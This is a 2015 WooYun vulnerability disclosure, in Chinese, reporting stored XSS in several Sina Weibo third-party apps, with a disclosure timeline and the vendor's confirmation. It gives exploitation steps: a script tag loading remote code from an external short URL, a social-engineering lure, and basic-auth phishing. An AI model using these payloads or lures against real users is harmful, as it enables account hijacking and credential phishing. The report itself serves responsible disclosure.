当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095883

漏洞标题:新浪应用多处 持久型xss 某处可以劫持账号权限

相关厂商:新浪

漏洞作者: izy

提交时间:2015-02-06 15:11

修复时间:2015-03-23 15:12

公开时间:2015-03-23 15:12

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-09: 厂商已经确认,细节仅向厂商公开
2015-02-19: 细节向核心白帽子及相关领域专家公开
2015-03-01: 细节向普通白帽子公开
2015-03-11: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

第三方应用很多都出现问题。

详细说明:

以前交过一个类似的问题,但是官方只是指那修哪。
这是随便找了几个应用测试:
如下都存在问题
http://batchhelper.sinaapp.com/
http://apps.weibo.com/guanjia
http://app.weibo.com/detail/62A7lB?ref=appsearch
http://app.weibo.com/detail/411VYf?ref=appsearch
http://app.weibo.com/detail/3MnIiu?ref=appsearch
http://app.weibo.com/detail/1iA37I?ref=appsearch
这两个第三方的可被劫持权限。(删除他所有的微博等等)
http://app.weibo.com/detail/62A7lB?ref=appsearch
http://app.weibo.com/detail/411VYf?ref=appsearch
原因:在批量删除的时候加载围脖,把过滤的全部转义回来了。不只是围脖,有些简介评论也有同样的问题。
利用方法:
(1)先让目标转发一个类似<script src=&#104;ttp://t.cn/Rhdd4Zp></script>的微博
(2)再让目标访问有问题的应用即可触发
虽然打到的cookie没用,但还是可以钓鱼什么的。
钓鱼过,消息是这么发的.庆祝sina应用xxxx,转发微博授权应用xxxxx可以抽奖什么。。。

屏幕快照 2015-02-05 下午8.04.28.png


演示basic认证钓鱼,还可以div。。跳转什么的

IMG_1522.PNG


漏洞证明:


屏幕快照 2015-02-05 下午7.44.45.png


&lt;svg:onload=alert(1)&gt;.png


屏幕快照 2015-02-05 下午7.36.23.png

修复方案:

对第三方应用过滤。

版权声明:转载请注明来源 izy@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-02-09 12:17

厂商回复:

感谢对新浪安全的支持,漏洞修复中。

最新状态:

暂无